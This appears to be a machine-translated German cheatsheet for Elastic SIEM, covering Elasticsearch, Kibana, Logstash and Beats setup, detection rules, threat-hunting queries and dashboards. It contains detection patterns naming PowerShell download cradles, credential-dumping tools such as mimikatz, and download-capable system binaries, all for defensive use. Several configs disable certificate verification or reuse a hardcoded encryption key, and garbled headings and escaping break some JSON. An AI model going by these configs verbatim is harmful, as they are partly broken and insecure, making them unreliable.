Elastische SIEM Cheatsheet

📋 Kopieren Sie alle Elastischen SIEM Befehle Elastische SIEM PDF Guide generieren

Elastic SIEM (Security Information and Event Management) ist eine umfassende Sicherheitsanalyselösung auf dem Elastic Stack (Elasticsearch, Logstash, Kibana und Beats). Es bietet Echtzeit-Drohung Erkennung, Untersuchungsfähigkeiten und Antwort-Orchestrierung für moderne Sicherheits-Operationszentren. Elastische SIEM nutzt maschinelles Lernen, Verhaltensanalysen und Bedrohungsinformationen, um fortschrittliche persistente Bedrohungen, Insider-Bedrohungen und anspruchsvolle Angriffskampagnen in hybriden Cloud-Umgebungen zu erkennen.

Überblick

Elastische Stack Architektur

Elastische SIEM ist auf der Grundlage des Elastischen Stacks gebaut, der eine verteilte, skalierbare Plattform für die Aufnahme, Speicherung, Suche und Visualisierung von Sicherheitsdaten im Massstab bietet. Die Architektur besteht aus mehreren Kernkomponenten, die zusammen arbeiten, um umfassende Sicherheitsüberwachungs- und Analysefunktionen zu bieten.

Elasticsearch dient als verteilte Such- und Analysemaschine, die Sicherheitsdaten aus dem gesamten Unternehmen speichert und indiziert. Es bietet Echtzeit-Suchfähigkeiten, erweiterte Aggregationen und maschinelle Lernfunktionen, die eine schnelle Bedrohungserkennung und -untersuchung ermöglichen. Die verteilte Natur von Elasticsearch ermöglicht Organisationen, ihre Sicherheitsdaten See horizontal zu skalieren, um wachsenden Datenmengen und Benutzeranforderungen gerecht zu werden.

Logstash fungiert als die Datenverarbeitungspipeline, die Sicherheitsdaten aus verschiedenen Quellen einnimmt, transformiert und bereichert, bevor sie an Elasticsearch gesendet wird. Es unterstützt Hunderte von Eingabe-Plugins zum Sammeln von Daten von Sicherheits-Tools, Netzwerk-Geräten, Cloud-Plattformen und benutzerdefinierte Anwendungen. Logstash kann Daten in Echtzeit parsieren, normalisieren und bereichern und Kontexte wie Geolokation, Bedrohungsinformationen und Asset-Informationen hinzufügen.

Kibana bietet die Benutzeroberfläche für Sicherheitsanalysten, um Sicherheitsdaten zu suchen, zu visualisieren und zu analysieren. Es umfasst vorgefertigte Dashboards, Erkennungsregeln, Case Management-Funktionen und Untersuchungs-Workflows, die speziell für Sicherheitsoperationen entwickelt wurden. Kibanas Visualisierungsfunktionen ermöglichen Analysten, benutzerdefinierte Dashboards zu erstellen, ad-hoc-Analysen durchzuführen und Executive Reports zu erstellen.

Beats sind leichte Datenversender, die Daten von Endpoints, Servern und Netzwerkgeräten an Logstash oder Elasticsearch sammeln und weiterleiten. Zu den sicherheitsgerichteten Beats zählen Winlogbeat für Windows-Ereignisprotokolle, Auditbeat für Systemauditdaten, Packetbeat für Netzwerkverkehrsanalyse und Filebeat für die Protokolldateisammlung.

Schlüsselmerkmale

```bash

Core SIEM Capabilities

• Real-time threat detection and alerting
• Advanced behavioral analytics and machine learning
• Threat hunting and investigation workflows
• Case management and incident response
• Timeline analysis and event correlation
• Threat intelligence integration
• Custom detection rule creation
• Executive dashboards and reporting ```_

Installation und Inbetriebnahme

Elasticsearch Installation

```bash

Download and install Elasticsearch

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.11.0-linux-x86_64.tar.gz tar -xzf elasticsearch-8.11.0-linux-x86_64.tar.gz cd elasticsearch-8.11.0

Configure Elasticsearch for SIEM

cat > config/elasticsearch.yml ``<< EOF cluster.name: elastic-siem node.name: siem-node-1 path.data: /var/lib/elasticsearch path.logs: /var/log/elasticsearch network.host: 0.0.0.0 http.port: 9200 discovery.type: single-node

Security settings

xpack.security.enabled: true xpack.security.enrollment.enabled: true xpack.security.http.ssl.enabled: true xpack.security.http.ssl.keystore.path: certs/http.p12 xpack.security.transport.ssl.enabled: true xpack.security.transport.ssl.verification_mode: certificate xpack.security.transport.ssl.keystore.path: certs/transport.p12 xpack.security.transport.ssl.truststore.path: certs/transport.p12 EOF

Start Elasticsearch

./bin/elasticsearch

Set up passwords for built-in users

./bin/elasticsearch-setup-passwords auto

Create SIEM-specific index templates

curl -X PUT "localhost:9200/index_template/siem-logs" \ -H "Content-Type: application/json" \ -u elastic:password \ -d '\{ "index_patterns": ["siem-*"], "template": \{ "settings": \{ "number_of_shards": 3, "number_of_replicas": 1, "index.lifecycle.name": "siem-policy", "index.lifecycle.rollover_alias": "siem-logs" \}, "mappings": \{ "properties": \{ "@timestamp": \{"type": "date"\}, "event.category": \{"type": "keyword"\}, "event.action": \{"type": "keyword"\}, "source.ip": \{"type": "ip"\}, "destination.ip": \{"type": "ip"\}, "user.name": \{"type": "keyword"\}, "host.name": \{"type": "keyword"\}, "process.name": \{"type": "keyword"\}, "file.hash.sha256": \{"type": "keyword"\} \} \} \} \}' ```

Kibana Installation und Konfiguration

```bash

Download and install Kibana

wget https://artifacts.elastic.co/downloads/kibana/kibana-8.11.0-linux-x86_64.tar.gz tar -xzf kibana-8.11.0-linux-x86_64.tar.gz cd kibana-8.11.0

Configure Kibana for SIEM

cat >`` config/kibana.yml << EOF server.port: 5601 server.host: "0.0.0.0" server.name: "elastic-siem-kibana" elasticsearch.hosts: ["https://localhost:9200"] elasticsearch.username: "kibana_system" elasticsearch.password: "kibana_password" elasticsearch.ssl.certificateAuthorities: ["/path/to/elasticsearch/config/certs/http_ca.crt"]

SIEM-specific settings

xpack.security.enabled: true xpack.encryptedSavedObjects.encryptionKey: "a7a6311933d3503b89bc2dbc36572c33a6c10925682e591bffcab6911c06786d" xpack.reporting.encryptionKey: "a7a6311933d3503b89bc2dbc36572c33a6c10925682e591bffcab6911c06786d" xpack.security.encryptionKey: "a7a6311933d3503b89bc2dbc36572c33a6c10925682e591bffcab6911c06786d"

Enable SIEM app

xpack.siem.enabled: true xpack.securitySolution.enabled: true EOF

Start Kibana

./bin/kibana

Access Kibana SIEM interface

Navigate to http://localhost:5601/app/security

```_

Logstash Konfiguration für SIEM

```bash

Install Logstash

wget https://artifacts.elastic.co/downloads/logstash/logstash-8.11.0-linux-x86_64.tar.gz tar -xzf logstash-8.11.0-linux-x86_64.tar.gz cd logstash-8.11.0

Create SIEM pipeline configuration

cat > config/siem-pipeline.conf << 'EOF' input \\{ # Windows Event Logs via Winlogbeat beats \\{ port => 5044 type => "winlogbeat" \\}

# Syslog from network devices syslog \\{ port => 514 type => "syslog" \\}

# CEF logs from security tools tcp \\{ port => 5140 codec => cef type => "cef" \\}

# File input for custom logs file \\{ path => "/var/log/security/*.log" start_position => "beginning" type => "security_logs" \\} \\}

filter \\{ # Parse Windows Security Events if [type] == "winlogbeat" \\{ if [winlog][event_id] == 4624 \\{ mutate \\{ add_field => \\{ "event.category" => "authentication" \\} add_field => \\{ "event.action" => "logon" \\} add_field => \\{ "event.outcome" => "success" \\} \\} \\}

if [winlog][event_id] == 4625 \\\\{
  mutate \\\\{
    add_field => \\\\{ "event.category" => "authentication" \\\\}
    add_field => \\\\{ "event.action" => "logon" \\\\}
    add_field => \\\\{ "event.outcome" => "failure" \\\\}
  \\\\}
\\\\}

if [winlog][event_id] == 4688 \\\\{
  mutate \\\\{
    add_field => \\\\{ "event.category" => "process" \\\\}
    add_field => \\\\{ "event.action" => "start" \\\\}
  \\\\}
\\\\}

\\}

# Parse syslog messages if [type] == "syslog" \\{ grok \\{ match => \\{ "message" => "%\\{SYSLOGTIMESTAMP:timestamp\\} %\\{IPORHOST:host\\} %\\{WORD:program\\}(?:[%\\{POSINT:pid\\}])?: %\\{GREEDYDATA:message\\}" \\} \\}

date \\\\{
  match => [ "timestamp", "MMM  d HH:mm:ss", "MMM dd HH:mm:ss" ]
\\\\}

\\}

# Enrich with GeoIP data if [source][ip] \\{ geoip \\{ source => "[source][ip]" target => "[source][geo]" \\} \\}

if [destination][ip] \\{ geoip \\{ source => "[destination][ip]" target => "[destination][geo]" \\} \\}

# Add threat intelligence translate \\{ field => "[source][ip]" destination => "[threat][indicator][type]" dictionary_path => "/etc/logstash/threat_intel.yml" fallback => "unknown" \\}

# Normalize timestamps date \\{ match => [ "@timestamp", "ISO8601" ] \\} \\}

output \\{ # Send to Elasticsearch elasticsearch \\{ hosts => ["https://localhost:9200"] user => "logstash_writer" password => "logstash_password" ssl => true ssl_certificate_verification => false index => "siem-logs-%\\{+YYYY.MM.dd\\}" template_name => "siem-logs" \\}

# Debug output stdout \\{ codec => rubydebug \\} \\} EOF

Start Logstash with SIEM pipeline

./bin/logstash -f config/siem-pipeline.conf ```_

Datenerhebung und -aufnahme

Beats Konfiguration für Sicherheitsdaten

```bash

Winlogbeat for Windows Event Logs

cat > winlogbeat.yml << 'EOF' winlogbeat.event_logs: - name: Security event_id: 4624, 4625, 4648, 4672, 4688, 4689, 4697, 4698, 4699, 4700, 4701, 4702 - name: System event_id: 7034, 7035, 7036, 7040 - name: Application event_id: 1000, 1001, 1002

output.elasticsearch: hosts: ["https://localhost:9200"] username: "winlogbeat_writer" password: "winlogbeat_password" ssl.certificate_authorities: ["/path/to/ca.crt"] index: "winlogbeat-%\\{+yyyy.MM.dd\\}"

processors: - add_host_metadata: when.not.contains.tags: forwarded - add_docker_metadata: ~ - add_kubernetes_metadata: ~

logging.level: info logging.to_files: true logging.files: path: /var/log/winlogbeat name: winlogbeat keepfiles: 7 permissions: 0644 EOF

Auditbeat for system audit data

cat > auditbeat.yml << 'EOF' auditbeat.modules: - module: auditd audit_rule_files: [ '$\\{path.config\\}/audit.rules.d/*.conf' ] audit_rules:| # Monitor file access -w /etc/passwd -p wa -k identity -w /etc/group -p wa -k identity -w /etc/shadow -p wa -k identity

# Monitor privilege escalation
-a always,exit -F arch=b64 -S execve -F euid=0 -F auid>=1000 -F auid!=4294967295 -k privilege_escalation

# Monitor network connections
-a always,exit -F arch=b64 -S socket -F a0=2 -k network_connect

# Monitor file modifications
-w /bin/ -p wa -k binaries
-w /sbin/ -p wa -k binaries
-w /usr/bin/ -p wa -k binaries
-w /usr/sbin/ -p wa -k binaries

• module: file_integrity paths:
• /bin
• /usr/bin
• /sbin
• /usr/sbin

• /etc

• module: system datasets:

  • host
  • login
  • package
  • process
  • socket
  • user period: 10s

output.elasticsearch: hosts: ["https://localhost:9200"] username: "auditbeat_writer" password: "auditbeat_password" ssl.certificate_authorities: ["/path/to/ca.crt"] index: "auditbeat-%\\{+yyyy.MM.dd\\}" EOF

Packetbeat for network traffic analysis

cat > packetbeat.yml << 'EOF' packetbeat.interfaces.device: any

packetbeat.flows: timeout: 30s period: 10s

packetbeat.protocols: dns: ports: [53] include_authorities: true include_additionals: true

http: ports: [80, 8080, 8000, 5000, 8002]

tls: ports: [443, 993, 995, 5223, 8443, 8883, 9243]

ssh: ports: [22]

output.elasticsearch: hosts: ["https://localhost:9200"] username: "packetbeat_writer" password: "packetbeat_password" ssl.certificate_authorities: ["/path/to/ca.crt"] index: "packetbeat-%\\{+yyyy.MM.dd\\}"

processors: - add_host_metadata: ~ - add_docker_metadata: ~ - add_kubernetes_metadata: ~ EOF ```_

Benutzerdefinierte Log Parsing

```bash

Create custom parsing rules for security tools

cat > /etc/logstash/conf.d/security-tools.conf << 'EOF' filter \\{ # Parse Suricata IDS logs if [type] == "suricata" \\{ json \\{ source => "message" \\}

if [event_type] == "alert" \\\\{
  mutate \\\\{
    add_field => \\\\{ "event.category" => "intrusion_detection" \\\\}
    add_field => \\\\{ "event.action" => "alert" \\\\}
    add_field => \\\\{ "rule.name" => "%\\\\{[alert][signature]\\\\}" \\\\}
    add_field => \\\\{ "rule.id" => "%\\\\{[alert][signature_id]\\\\}" \\\\}
  \\\\}
\\\\}

\\}

# Parse Zeek/Bro logs if [type] == "zeek" \\{ if [log_type] == "conn" \\{ mutate \\{ add_field => \\{ "event.category" => "network" \\} add_field => \\{ "event.action" => "connection" \\} \\} \\}

if [log_type] == "dns" \\\\{
  mutate \\\\{
    add_field => \\\\{ "event.category" => "network" \\\\}
    add_field => \\\\{ "event.action" => "dns_query" \\\\}
  \\\\}
\\\\}

if [log_type] == "http" \\\\{
  mutate \\\\{
    add_field => \\\\{ "event.category" => "network" \\\\}
    add_field => \\\\{ "event.action" => "http_request" \\\\}
  \\\\}
\\\\}

\\}

# Parse OSSEC/Wazuh logs if [type] == "ossec" \\{ grok \\{ match => \\{ "message" => "%\\{TIMESTAMP_ISO8601:timestamp\\} %\\{WORD:hostname\\} %\\{WORD:component\\}: %\\{GREEDYDATA:alert_message\\}" \\} \\}

if [rule_id] \\\\{
  mutate \\\\{
    add_field => \\\\{ "event.category" => "host" \\\\}
    add_field => \\\\{ "event.action" => "alert" \\\\}
    add_field => \\\\{ "rule.id" => "%\\\\{rule_id\\\\}" \\\\}
  \\\\}
\\\\}

\\} \\} EOF ```_

Nachweisregeln und Analytics

Vorgefertigte Nachweisregeln

```json // Suspicious PowerShell Activity \\{ "rule": \\{ "name": "Suspicious PowerShell Execution", "description": "Detects potentially malicious PowerShell commands", "severity": "high", "risk_score": 75, "query": \\{ "bool": \\{ "must": [ \\{ "term": \\{ "event.category": "process" \\} \\}, \\{ "term": \\{ "process.name": "powershell.exe" \\} \\}, \\{ "bool": \\{ "should": [ \\{ "wildcard": \\{ "process.command_line": "Invoke-Expression" \\} \\}, \\{ "wildcard": \\{ "process.command_line": "DownloadString" \\} \\}, \\{ "wildcard": \\{ "process.command_line": "EncodedCommand" \\} \\}, \\{ "wildcard": \\{ "process.command_line": "-nop" \\} \\}, \\{ "wildcard": \\{ "process.command_line": "-w hidden" \\} \\} ] \\} \\} ] \\} \\}, "filters": [], "timeline_id": "timeline_powershell", "timeline_title": "PowerShell Investigation Timeline" \\} \\}

// Brute Force Login Attempts \\{ "rule": \\{ "name": "Brute Force Login Attempts", "description": "Detects multiple failed login attempts from the same source", "severity": "medium", "risk_score": 50, "query": \\{ "bool": \\{ "must": [ \\{ "term": \\{ "event.category": "authentication" \\} \\}, \\{ "term": \\{ "event.outcome": "failure" \\} \\} ] \\} \\}, "threshold": \\{ "field": "source.ip", "value": 10, "cardinality": [ \\{ "field": "user.name", "value": 5 \\} ] \\}, "timeline_id": "timeline_brute_force", "timeline_title": "Brute Force Investigation Timeline" \\} \\}

// Lateral Movement Detection \\{ "rule": \\{ "name": "Lateral Movement via Remote Services", "description": "Detects potential lateral movement using remote services", "severity": "high", "risk_score": 80, "query": \\{ "bool": \\{ "must": [ \\{ "term": \\{ "event.category": "authentication" \\} \\}, \\{ "term": \\{ "event.outcome": "success" \\} \\}, \\{ "terms": \\{ "winlog.logon.type": ["3", "10"] \\} \\} ] \\} \\}, "threshold": \\{ "field": "user.name", "value": 1, "cardinality": [ \\{ "field": "host.name", "value": 5 \\} ] \\} \\} \\} ```_

Stellenangebote

```json // Anomalous Network Traffic \\{ "job_id": "anomalous_network_traffic", "description": "Detects anomalous network traffic patterns", "analysis_config": \\{ "bucket_span": "15m", "detectors": [ \\{ "function": "high_count", "field_name": "network.bytes", "by_field_name": "source.ip" \\}, \\{ "function": "rare", "field_name": "destination.port", "by_field_name": "source.ip" \\} ], "influencers": ["source.ip", "destination.ip", "destination.port"] \\}, "data_description": \\{ "time_field": "@timestamp", "time_format": "epoch_ms" \\}, "datafeed_config": \\{ "indices": ["packetbeat-*"], "query": \\{ "bool": \\{ "must": [ \\{ "term": \\{ "event.category": "network" \\} \\} ] \\} \\} \\} \\}

// Unusual Process Execution \\{ "job_id": "unusual_process_execution", "description": "Detects unusual process execution patterns", "analysis_config": \\{ "bucket_span": "15m", "detectors": [ \\{ "function": "rare", "field_name": "process.name", "by_field_name": "host.name" \\}, \\{ "function": "freq_rare", "field_name": "process.command_line", "by_field_name": "user.name" \\} ], "influencers": ["host.name", "user.name", "process.name"] \\}, "data_description": \\{ "time_field": "@timestamp", "time_format": "epoch_ms" \\}, "datafeed_config": \\{ "indices": ["winlogbeat-", "auditbeat-"], "query": \\{ "bool": \\{ "must": [ \\{ "term": \\{ "event.category": "process" \\} \\}, \\{ "term": \\{ "event.action": "start" \\} \\} ] \\} \\} \\} \\} ```_

Zollbestimmungen

```bash

Create custom detection rule via API

curl -X POST "localhost:5601/api/detection_engine/rules" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "name": "Credential Dumping Activity", "description": "Detects potential credential dumping tools and techniques", "severity": "critical", "risk_score": 90, "rule_id": "credential-dumping-001", "type": "query", "query": "event.category:process AND (process.name:(mimikatz.exe OR procdump.exe OR pwdump.exe OR fgdump.exe) OR process.command_line:(sekurlsa OR logonpasswords OR lsadump OR sam OR security))", "language": "kuery", "filters": [], "from": "now-6m", "to": "now", "interval": "5m", "enabled": true, "tags": ["credential_access", "T1003"], "threat": [ \\{ "framework": "MITRE ATT&CK;", "tactic": \\{ "id": "TA0006", "name": "Credential Access", "reference": "https://attack.mitre.org/tactics/TA0006/" \\}, "technique": [ \\{ "id": "T1003", "name": "OS Credential Dumping", "reference": "https://attack.mitre.org/techniques/T1003/" \\} ] \\} ] \\}'

Create threshold-based rule

curl -X POST "localhost:5601/api/detection_engine/rules" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "name": "Multiple Failed SSH Logins", "description": "Detects multiple failed SSH login attempts", "severity": "medium", "risk_score": 60, "rule_id": "ssh-brute-force-001", "type": "threshold", "query": "event.category:authentication AND event.outcome:failure AND service.name:ssh", "language": "kuery", "threshold": \\{ "field": "source.ip", "value": 20, "cardinality": [ \\{ "field": "user.name", "value": 5 \\} ] \\}, "from": "now-5m", "to": "now", "interval": "5m", "enabled": true, "tags": ["initial_access", "T1078"] \\}' ```_

Untersuchung und Bedrohung Jagd

Zeitanalyse

```bash

Create investigation timeline

curl -X POST "localhost:5601/api/timeline" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "timeline": \\{ "title": "Incident Investigation Timeline", "description": "Timeline for investigating security incident", "timelineType": "default", "templateTimelineId": null, "templateTimelineVersion": null, "dataProviders": [ \\{ "id": "host-investigation", "name": "Host Investigation", "enabled": true, "excluded": false, "kqlQuery": "", "queryMatch": \\{ "field": "host.name", "value": "suspicious-host", "operator": ":" \\} \\} ], "kqlQuery": \\{ "filterQuery": \\{ "kuery": \\{ "kind": "kuery", "expression": "host.name: suspicious-host" \\} \\} \\}, "dateRange": \\{ "start": "2023-01-01T00:00:00.000Z", "end": "2023-01-02T00:00:00.000Z" \\} \\} \\}'

Query timeline events

curl -X POST "localhost:5601/api/timeline/search" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "defaultIndex": ["winlogbeat-", "auditbeat-", "packetbeat-*"], "timerange": \\{ "from": "2023-01-01T00:00:00.000Z", "to": "2023-01-02T00:00:00.000Z", "interval": "12h" \\}, "filterQuery": \\{ "bool": \\{ "must": [ \\{ "term": \\{ "host.name": "suspicious-host" \\} \\} ] \\} \\}, "pagination": \\{ "activePage": 0, "querySize": 25 \\}, "sort": \\{ "columnId": "@timestamp", "sortDirection": "desc" \\} \\}' ```

Threat Hunting Quers

```bash

Hunt for living off the land techniques

GET /winlogbeat-/_search \\{ "query": \\{ "bool": \\{ "must": [ \\{ "term": \\{ "event.category": "process" \\} \\}, \\{ "terms": \\{ "process.name": [ "certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "wmic.exe" ] \\} \\}, \\{ "bool": \\{ "should": [ \\{ "wildcard": \\{ "process.command_line": "http" \\} \\}, \\{ "wildcard": \\{ "process.command_line": "download" \\} \\}, \\{ "wildcard": \\{ "process.command_line": "urlcache*" \\} \\} ] \\} \\} ] \\} \\}, "aggs": \\{ "by_host": \\{ "terms": \\{ "field": "host.name", "size": 10 \\}, "aggs": \\{ "by_process": \\{ "terms": \\{ "field": "process.name", "size": 10 \\} \\} \\} \\} \\} \\}

Hunt for persistence mechanisms

GET /winlogbeat-/_search \\{ "query": \\{ "bool": \\{ "should": [ \\{ "bool": \\{ "must": [ \\{ "term": \\{ "winlog.event_id": 4698 \\} \\}, \\{ "wildcard": \\{ "winlog.event_data.TaskName": "Microsoft" \\} \\} ] \\} \\}, \\{ "bool": \\{ "must": [ \\{ "term": \\{ "event.category": "registry" \\} \\}, \\{ "terms": \\{ "registry.path": [ "\Software\Microsoft\Windows\CurrentVersion\Run", "\Software\Microsoft\Windows\CurrentVersion\RunOnce", "\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" ] \\} \\} ] \\} \\}, \\{ "bool": \\{ "must": [ \\{ "term": \\{ "event.category": "file" \\} \\}, \\{ "terms": \\{ "file.path": [ "\Startup\", "\Start Menu\Programs\Startup\*" ] \\} \\} ] \\} \\} ] \\} \\} \\}

Hunt for data exfiltration

GET /packetbeat-*/search \\{ "query": \\{ "bool": \\{ "must": [ \\{ "range": \\{ "@timestamp": \\{ "gte": "now-24h" \\} \\} \\}, \\{ "term": \\{ "network.direction": "outbound" \\} \\} ] \\} \\}, "aggs": \\{ "large_transfers": \\{ "filter": \\{ "range": \\{ "network.bytes": \\{ "gte": 100000000 \\} \\} \\}, "aggs": \\{ "by_source": \\{ "terms": \\{ "field": "source.ip", "size": 10 \\}, "aggs": \\{ "total_bytes": \\{ "sum": \\{ "field": "network.bytes" \\} \\}, "destinations": \\{ "terms": \\{ "field": "destination.ip", "size": 5 \\} \\} \\} \\} \\} \\} \\} \\} ```

Fallstudie

```bash

Create security case

curl -X POST "localhost:5601/api/cases" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "title": "Suspicious PowerShell Activity Investigation", "description": "Investigation of suspicious PowerShell commands detected on multiple hosts", "tags": ["powershell", "malware", "investigation"], "severity": "high", "assignees": [ \\{ "uid": "analyst1" \\} ], "connector": \\{ "id": "none", "name": "none", "type": ".none", "fields": null \\}, "settings": \\{ "syncAlerts": true \\} \\}'

Add comment to case

curl -X POST "localhost:5601/api/cases/\\{case_id\\}/comments" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "comment": "Initial analysis shows PowerShell commands attempting to download and execute malicious payloads. Affected hosts: HOST-001, HOST-002, HOST-003", "type": "user" \\}'

Attach alert to case

curl -X POST "localhost:5601/api/cases/\\{case_id\\}/comments" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "alertId": "alert-id-123", "index": "winlogbeat-2023.01.01", "type": "alert" \\}' ```_

Dashboards und Visualisierung

Sicherheit Übersicht Dashboard

json \\\\{ "dashboard": \\\\{ "title": "Security Operations Center Overview", "description": "High-level security metrics and alerts", "panelsJSON": "[\\\\{\"version\":\"8.11.0\",\"gridData\":\\\\{\"x\":0,\"y\":0,\"w\":24,\"h\":15,\"i\":\"1\"\\\\},\"panelIndex\":\"1\",\"embeddableConfig\":\\\\{\\\\},\"panelRefName\":\"panel_1\"\\\\}]", "optionsJSON": "\\\\{\"useMargins\":true,\"syncColors\":false,\"hidePanelTitles\":false\\\\}", "version": 1, "timeRestore": true, "timeTo": "now", "timeFrom": "now-24h", "refreshInterval": \\\\{ "pause": false, "value": 300000 \\\\}, "kibanaSavedObjectMeta": \\\\{ "searchSourceJSON": "\\\\{\"query\":\\\\{\"query\":\"\",\"language\":\"kuery\"\\\\},\"filter\":[]\\\\}" \\\\} \\\\}, "references": [ \\\\{ "name": "panel_1", "type": "visualization", "id": "security-alerts-timeline" \\\\} ] \\\\}_

Threat Hunting Dashboard

```bash

Create threat hunting visualizations

curl -X POST "localhost:5601/api/saved_objects/visualization" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "attributes": \\{ "title": "Process Execution Timeline", "visState": "\\{\"title\":\"Process Execution Timeline\",\"type\":\"histogram\",\"params\":\\{\"grid\":\\{\"categoryLines\":false,\"style\":\\{\"color\":\"#eee\"\\}\\},\"categoryAxes\":[\\{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":\\{\\},\"scale\":\\{\"type\":\"linear\"\\},\"labels\":\\{\"show\":true,\"truncate\":100\\},\"title\":\\{\\}\\}],\"valueAxes\":[\\{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":\\{\\},\"scale\":\\{\"type\":\"linear\",\"mode\":\"normal\"\\},\"labels\":\\{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100\\},\"title\":\\{\"text\":\"Count\"\\}\\}],\"seriesParams\":[\\{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":\\{\"label\":\"Count\",\"id\":\"1\"\\},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true\\}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false\\},\"aggs\":[\\{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":\\{\\}\\},\\{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":\\{\"field\":\"@timestamp\",\"interval\":\"auto\",\"customInterval\":\"2h\",\"min_doc_count\":1,\"extended_bounds\":\\{\\}\\}\\},\\{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":\\{\"field\":\"process.name\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\"\\}\\}]\\}", "uiStateJSON": "\\{\\}", "description": "", "version": 1, "kibanaSavedObjectMeta": \\{ "searchSourceJSON": "\\{\"index\":\"winlogbeat-*\",\"query\":\\{\"match\":\\{\"event.category\":\"process\"\\}\\},\"filter\":[]\\}" \\} \\} \\}'

Network traffic analysis visualization

curl -X POST "localhost:5601/api/saved_objects/visualization" \ -H "Content-Type: application/json" \ -H "kbn-xsrf: true" \ -u elastic:password \ -d '\\{ "attributes": \\{ "title": "Network Traffic by Destination Port", "visState": "\\{\"title\":\"Network Traffic by Destination Port\",\"type\":\"pie\",\"params\":\\{\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true\\},\"aggs\":[\\{\"id\":\"1\",\"enabled\":true,\"type\":\"sum\",\"schema\":\"metric\",\"params\":\\{\"field\":\"network.bytes\"\\}\\},\\{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":\\{\"field\":\"destination.port\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\"\\}\\}]\\}", "uiStateJSON": "\\{\\}", "description": "", "version": 1, "kibanaSavedObjectMeta": \\{ "searchSourceJSON": "\\{\"index\":\"packetbeat-*\",\"query\":\\{\"match_all\":\\{\\}\\},\"filter\":[]\\}" \\} \\} \\}' ```_

Leistungsoptimierung

Index Management

```bash

Create index lifecycle policy

curl -X PUT "localhost:9200/_ilm/policy/siem-policy" \ -H "Content-Type: application/json" \ -u elastic:password \ -d '\\{ "policy": \\{ "phases": \\{ "hot": \\{ "actions": \\{ "rollover": \\{ "max_size": "10GB", "max_age": "1d" \\}, "set_priority": \\{ "priority": 100 \\} \\} \\}, "warm": \\{ "min_age": "7d", "actions": \\{ "set_priority": \\{ "priority": 50 \\}, "allocate": \\{ "number_of_replicas": 0 \\}, "forcemerge": \\{ "max_num_segments": 1 \\} \\} \\}, "cold": \\{ "min_age": "30d", "actions": \\{ "set_priority": \\{ "priority": 0 \\}, "allocate": \\{ "number_of_replicas": 0 \\} \\} \\}, "delete": \\{ "min_age": "90d", "actions": \\{ "delete": \\{\\} \\} \\} \\} \\} \\}'

Optimize search performance

curl -X PUT "localhost:9200/siem-logs-*/_settings" \ -H "Content-Type: application/json" \ -u elastic:password \ -d '\\{ "index": \\{ "refresh_interval": "30s", "number_of_replicas": 1, "codec": "best_compression" \\} \\}'

Create search templates for common queries

curl -X PUT "localhost:9200/scripts/security-event-search" \ -H "Content-Type: application/json" \ -u elastic:password \ -d '\\{ "script": \\{ "lang": "mustache", "source": \\{ "query": \\{ "bool": \\{ "must": [ \\{ "range": \\{ "@timestamp": \\{ "gte": "\\{\\{from\\}\\}", "lte": "\\{\\{to\\}\\}" \\} \\} \\}, \\{ "term": \\{ "event.category": "\\{\\{category\\}\\}" \\} \\} ], "filter": [ \\{\\{#host\\}\\} \\{ "term": \\{ "host.name": "\\{\\{host\\}\\}" \\} \\} \\{\\{/host\\}\\} ] \\} \\}, "sort": [ \\{ "@timestamp": \\{ "order": "desc" \\} \\} ] \\} \\} \\}' ```

Überwachung und Alarmierung

```bash

Monitor cluster health

curl -X GET "localhost:9200/_cluster/health?pretty" -u elastic:password

Monitor index statistics

curl -X GET "localhost:9200/_cat/indices/siem-*?v&s;=store.size:desc" -u elastic:password

Set up cluster monitoring

curl -X PUT "localhost:9200/_cluster/settings" \ -H "Content-Type: application/json" \ -u elastic:password \ -d '\\{ "persistent": \\{ "cluster.routing.allocation.disk.watermark.low": "85%", "cluster.routing.allocation.disk.watermark.high": "90%", "cluster.routing.allocation.disk.watermark.flood_stage": "95%" \\} \\}'

Create watcher for disk space monitoring

curl -X PUT "localhost:9200/watcher/watch/disk_space_monitor" \ -H "Content-Type: application/json" \ -u elastic:password \ -d '\\{ "trigger": \\{ "schedule": \\{ "interval": "5m" \\} \\}, "input": \\{ "http": \\{ "request": \\{ "host": "localhost", "port": 9200, "path": "/_nodes/stats/fs", "auth": \\{ "basic": \\{ "username": "elastic", "password": "password" \\} \\} \\} \\} \\}, "condition": \\{ "script": \\{ "source": "ctx.payload.nodes.values().stream().anyMatch(node -> node.fs.total.available_in_bytes / node.fs.total.total_in_bytes < 0.1)" \\} \\}, "actions": \\{ "send_email": \\{ "email": \\{ "to": ["admin@company.com"], "subject": "Elasticsearch Disk Space Alert", "body": "Disk space is running low on Elasticsearch cluster" \\} \\} \\} \\}' ```

Ressourcen

